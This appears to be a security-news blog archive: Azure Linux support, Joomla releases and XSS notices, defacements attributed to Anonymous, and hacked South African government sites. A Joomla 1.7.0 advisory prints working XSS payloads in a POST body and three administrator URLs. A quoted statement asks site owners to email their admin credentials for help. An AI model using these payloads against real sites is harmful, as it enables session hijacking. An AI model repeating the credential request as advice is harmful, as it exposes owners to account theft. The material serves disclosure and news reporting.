
Microsoft Azure Cloud Starts Supporting Linux (Hybrid Cloud)


If you use both Microsoft and Linux products, there is good news for you: Microsoft is now offering Linux-based operating systems on its Windows Azure cloud service. The software giant has announced the release of a new preview version of the platform which will add Infrastructure-as-a-Service (IaaS) capabilities to it. As well as Windows Server 2008 and the release candidate of Windows Server 2012, Microsoft will be supporting openSUSE 12.1, SUSE Linux Enterprise Server 11, Ubuntu 12.04 and CentOS 6.2 on the Hyper-V virtual machines that power Azure.

Some of the Highlights:- 
  • Windows Azure Virtual Machines— Virtual Machines give you application mobility, allowing you to move your virtual hard disks (VHDs) back and forth between on-premises and the cloud.   Migrate existing workloads such as Microsoft SQL Server or Microsoft SharePoint to the cloud, bring your own customized Windows Server or Linux images, or select from a gallery.    As a common virtualization file format, VHD has been adopted by hundreds of vendors and is a freely available specification covered under the Microsoft Open Specification Promise.
  • Windows Azure Virtual Network— Virtual Network lets you provision and manage virtual private networks (VPNs) in Windows Azure as well as securely extend on-premises networks into the cloud.  It provides control over network topology, including configuration of IP addresses, routing tables and security policies and uses the industry-standard IPSEC protocol to provide a secure connection between your corporate VPN gateway and Windows Azure. 
  • Windows Azure Web Sites —Build web sites and applications with this highly elastic solution supporting .NET, Node.js, and PHP while using common deployment techniques like Git and FTP.  Windows Azure Web Sites will also allow easy deployment of open source applications like WordPress, Joomla!, DotNetNuke, Umbraco, and Drupal to the cloud with a few clicks. 
  • New tools, language support, and SDK—Windows Azure SDK June 2012 includes new developer capabilities for writing code against the latest service improvements with updated support for Java, PHP, and .NET, and the addition of Python as a supported language on Windows Azure.  Additionally, the SDK now provides 100% command line support for both Windows and Mac.
  • Availability in New Countries— Availability of Windows Azure is being expanded to customers in 48 new countries, including Russia, South Korea, Taiwan, Turkey, Egypt, South Africa, and Ukraine.  Roll-out will be complete later this month, making Windows Azure one of the most widely available cloud platforms in the industry with offerings in 89 countries and in 19 local currencies.  
These new capabilities simplify building and bringing applications of all kinds to the cloud and enable flexibility in the following areas:
  • Increased datacenter capacity through secure VPN connections to the cloud
  • Easy operations and management from an improved Windows Azure Management Portal, with powerful operational capabilities for deploying and managing your cloud applications – with similar management support from the command line
  • Cloud scale for building websites with ASP.NET, PHP, and Node.js
  • Support for additional Operating Systems and OSS language libraries for building cloud applications
  • Scale on demand by migrating existing applications to the cloud using portable, industry standard VHDs -- delivering global scale with maximum control
  • Secure connectivity between cloud and on-premises applications
  • Ability to develop, test and configure new applications in the cloud, and then deploy on-premises for production




Security Flaws In Joomla! 2.5.1 & 2.5.0


A few days ago the Joomla developers officially released version 2.5, but history has repeated itself: security flaws have been found in the current version of Joomla. The Joomla! Developer Network has confirmed these security holes, and yesterday it released an immediate patch for the vulnerability. Both Joomla versions 2.5.1 and 2.5.0 have been found vulnerable to cross-site scripting.

Vulnerability Description:-
Inadequate filtering leads to XSS vulnerability.

Affected Installs:-
Joomla! version 2.5.1 and 2.5.0.

Solution:-
Upgrade to version 2.5.2



Joomla! 2.5 Released, Extra Features Included & Security Holes Closed

We have covered Joomla a lot before. A few months ago the Joomla Project released Joomla 1.7.0, and many vulnerabilities were found after that release. Now, after a long time, the developers have officially released Joomla 2.5.0.

Brief About Joomla:- 
Joomla, one of the world’s most popular open source content management systems (CMS) used for everything from websites to blogs to Intranets, today announces the immediate availability of Joomla 2.5. Along with new features such as advanced search and automatic notification of Joomla core and extension updates, the Joomla CMS for the first time includes multi-database support with the addition of Microsoft SQL Server. Previous versions of Joomla were compatible exclusively with MySQL databases.

Key Features Of Joomla 2.5.0:-
  • Automatic notification when a Joomla or extension update is available. When logged into the control panel, site administrators will instantly have access to new notification buttons that allow them to see and act on the latest updates. In addition to updates for the Joomla CMS, a second button offers third party extension notification updates.
  • A better natural language search engine to the Joomla core. Complete with auto-completion and stemming (for example if you type “running” in a search field you also see run), it is faster and more versatile than the standard search.






Anonymous Took Responsibility Of Hacking Into 50+ Toronto Websites (#OccupyToronto)


Anonymous took responsibility for hacking into 50+ Toronto websites. In a YouTube video, Anon said:
"We have been receiving plenty of complaints that Toronto business based websites have been hacked. People quickly assumed that OccupyTO was behind this, but luckily Anonymous stepped up to the plate for taking responsibilities for their actions. At this moment we do not know why the websites were redirected to OccupyTO’s website (www.occupyto.org). Although, this seemed to be a response to the first video that threatened to remove Toronto from the internet. All we can say at this point is that Anonymous is stating a point that this occurred because of the city's actions to evict the protesters. A video is claiming that Anonymous attacked 50+ Toronto business based websites, took down the Canadian Craigslist website, and gained access to a valuable email account. We hope everything comes down to a peaceful agreement."





"It has come to our attention that some websites in Toronto have started re-directing to the occupyto.org website.  Please be advised that this action is NOT condoned by the Occupy Toronto movement, rather some individual has taken it upon themselves to compromise websites in this way. 
The issue seems to be related to websites running Joomla 1.5 or 1.6.  The solution is to check the source code of the page and search for the word ‘occupy’.  Once you have located the code you should have an indication of what article contains the script.  In some cases it may be in multiple articles.  Just edit and save each infected article and the problem should be solved.
If you are unable to solve the problem yourself, free support is being offered.  Just send an email to occupyto@blinktwice.ca with your website address and the username and password of an account that has access to edit your website.  Rest assured your login information will be held in the strictest confidence.  Once the problem is solved it is advised to change your password(s) to the site" Anonymous added.
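The clean-up check described in the statement above, as an added example that is not part of the quoted statement or the original post: it searches article bodies for the keyword and separates hits inside active markup (script, meta refresh, iframe) from harmless mentions in prose. The article tuples are constructed sample data, and the (id, title, HTML body) export format is an assumption.

```python
import re

KEYWORD = "occupy"

# Constructed sample of exported article bodies: (id, title, HTML body).
ARTICLES = [
    (12, "Opening hours", "<p>We are open 9-5.</p>"),
    (27, "Contact", '<p>Call us.</p><script>window.location='
                    '"http://www.occupyto.org";</script>'),
    (31, "News", "<p>Coverage of the Occupy protests downtown.</p>"),
    (40, "Specials", '<meta http-equiv="refresh" '
                     'content="0;url=http://www.occupyto.org">'),
]

# Markup that can redirect a visitor without any click.
ACTIVE = {
    "script": re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S),
    "meta-refresh": re.compile(
        r"<meta\b[^>]*http-equiv\s*=\s*[\"']?refresh[^>]*>", re.I),
    "iframe": re.compile(r"<iframe\b[^>]*>", re.I),
}

def scan_article(body, keyword=KEYWORD):
    """Return the kinds of active markup in body that mention keyword."""
    hits = []
    for kind, pattern in ACTIVE.items():
        if any(keyword in m.group(0).lower() for m in pattern.finditer(body)):
            hits.append(kind)
    return hits

def scan(articles, keyword=KEYWORD):
    """Map article id -> findings; 'text-only' means keyword only in prose."""
    report = {}
    for art_id, _title, body in articles:
        if keyword not in body.lower():
            continue
        report[art_id] = scan_article(body, keyword) or ["text-only"]
    return report

if __name__ == "__main__":
    for art_id, findings in scan(ARTICLES).items():
        print(art_id, findings)
```

Articles reported with a finding other than `text-only` are the ones to edit and re-save.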







Multiple XSS Vulnerabilities Found in Joomla! 1.7.0


Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site Scripting issues.

About Joomla:- 
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.


Vulnerability Description:-

Several parameters (searchword, extension, asset, author) in Joomla! core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct cross-site scripting attacks. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.


Version Affected:-
1.7.0 <=


PROOF-OF-CONCEPT/EXPLOIT:-
parameter: searchword, component: com_search (Browser: IE, Konqueror)
=======================================================
N.B. Our previous reported issue of "searchword" parameter XSS was not fixed completely.

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]

User Login is required to execute the following XSSes.

Parameter: extension, Component: com_categories
http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter: asset, Component: com_media
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter: author, Component: com_media
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

Impact:-
Attackers can compromise the session of a currently logged-in user or administrator and impersonate arbitrary user actions available under /administrator/ functions.

Solution:-
Upgrade to Joomla! 1.7.1-stable or higher.
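
Why the administrator URLs above work, and what the missing sanitization looks like when it is present, as an added example (not Joomla's code and not part of the original advisory). It assumes the parameter is reflected into a double-quoted HTML attribute; the template, the allow-list pattern and the shortened URL are constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Shortened form of the "extension" PoC URL above (style="..." part dropped).
POC_URL = ("http://localhost/joomla17_noseo/administrator/index.php"
           "?option=com_categories&extension=com_content%20%22onmouseover="
           "%22alert%28/XSS/%29%22%20x=%22")

# Hypothetical template: the parameter reflected into a quoted attribute.
TEMPLATE = '<input type="hidden" name="extension" value="{}" />'

def reflected_value(url, param):
    """Return the decoded query-string value as the server would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[param][0]

def render_vulnerable(value):
    return TEMPLATE.format(value)  # no output encoding

def render_hardened(value):
    # Encodes & < > " ' so the value cannot close the attribute.
    return TEMPLATE.format(html.escape(value, quote=True))

class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)

def parsed_attributes(markup):
    """Attributes an HTML parser sees on the rendered <input>."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs

def injected_handlers(markup):
    """Event-handler attributes (on*) present after parsing."""
    return sorted(k for k in parsed_attributes(markup) if k.startswith("on"))

def is_valid_extension(value):
    """Assumed allow-list: a component name such as com_content."""
    return re.fullmatch(r"com_[a-z0-9_]+", value) is not None

if __name__ == "__main__":
    v = reflected_value(POC_URL, "extension")
    print(injected_handlers(render_vulnerable(v)))
    print(injected_handlers(render_hardened(v)))
    print(is_valid_extension(v), is_valid_extension("com_content"))
```

Output encoding for the attribute context and allow-list validation of the parameter are independent controls; either one alone stops this particular input. PHP's equivalent of the encoding step is `htmlspecialchars()` with `ENT_QUOTES`.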




 
 
-News Source (Joomla!)




17 Websites Hacked By Cool boy HaXoR

Joomla 1.7.0 Released


The Joomla Project is pleased to announce the immediate availability of Joomla 1.7.0. This is a security release. This is also the first release made within the new six-month release cycle that started with the delivery of Joomla 1.6 in January 2011.
The Production Leadership Team's goal is to continue to provide regular, frequent updates to the Joomla community. Learn more about Joomla! development at the Developer Site.
To improve the platform's security, Joomla! 1.7 offers a new one-click version updating mechanism that allows users to update a site to the latest stable version with a single click. A built-in updater is also included for Joomla! and extensions. The developers hope that this will help users keep up to date with the latest version so that they are not vulnerable to any security holes found in previous versions.
Mark Dexter of the Joomla Production Leadership Team said that "the user community placed a large emphasis on making the CMS installation process as simple as possible and new versions more frequent. This will allow users to more easily and frequently migrate to the latest version of Joomla, and take advantage of all the security benefits associated with running the newest code."
Other changes include the ability to create a search menu option with pre-defined search options, improved example code for various plug-in types that developers can use to create custom extensions, an option to automatically validate form data, and multi-language improvements. The platform (libraries folder) has been split from the CMS itself in order to allow the platform "to be enhanced outside of Joomla and used for other types of development projects". The latest update also addresses a medium priority cross-site scripting (XSS) vulnerability found in version 1.6.5 and all earlier 1.6.x versions. The developers note that version 1.6.5 will reach its end of life on 19 August 2011, Joomla! 1.7 will have a support cycle of seven months, and long term support will be active for 15 months from version 1.8. All users are advised to update as soon as possible; upgrade instructions are provided.


6 Joomla based Websites Hacked By Likuid Sky


Joomla! 1.6 update Fixes security holes

The Joomla! developers have released version 1.6.4 of their open source content management system (CMS), a maintenance and security update to the 1.6 branch. The latest version addresses a total of four security vulnerabilities.
The vulnerabilities include two medium priority cross-site scripting (XSS) issues, a medium priority problem related to inadequate permission checking that could allow for unauthorised access, and a low priority information disclosure hole caused by inadequate filtering. Versions up to and including 1.6.3 are reportedly affected. All users are advised to update as soon as possible.
Joomla! is a widely used and easily deployed PHP-based CMS, which can be used to create anything from small web sites to corporate sites and large online applications. Examples of how it is being used can be found in the Community Showcase.
Further details about the update can be found in the official release announcement. Joomla! 1.6.4 is available to download from the project's web site and is released under the GNU General Public License. The Joomla! Project is sponsored by Open Source Matters, Inc., a non-profit organization.

The Film and Publication Board’s (FPB) website, hosted (GOV SITE)

 Another government website hacked
The Film and Publication Board’s (FPB) website, hosted at http://www.fpb.gov.za, is the latest government website to be hacked.
Visitors to the FPB website on Monday were greeted by the message “Hacked By Dr.KroOoZ - By.NeShTeR / TTG” and the PHP error code “Fatal error: Class 'JConfig' not found in…”
The recent security breaches are often related to software which is not updated, and since the FPB’s website is built on the popular Joomla Open Source Software (OSS) regular security updates are necessary to avoid hacking vulnerabilities.
Details about the FPB hacking are as yet unknown, and at the time of publication the hacking message still displayed on all web pages. It is not clear when the website will be restored.
The FPB website hacking follows security breaches of the ANC and ANC Youth League websites over the last month.
Many ANC Youth League (ANCYL) visitors were surprised on 30 March when the message “Julius Malema to Step Down as Youth League President” featured as the main story.
The ANCYL website was taken down for a short period of time after the security breach, and the article was subsequently deleted.
The ANC website was also hacked a few days ago, redirecting visitors to a Turkish website. 
According to City Press, ANC spokesperson and national executive committee member Jackson Mthembu said the hacking was in bad taste, and vowed to “unhack” the website.
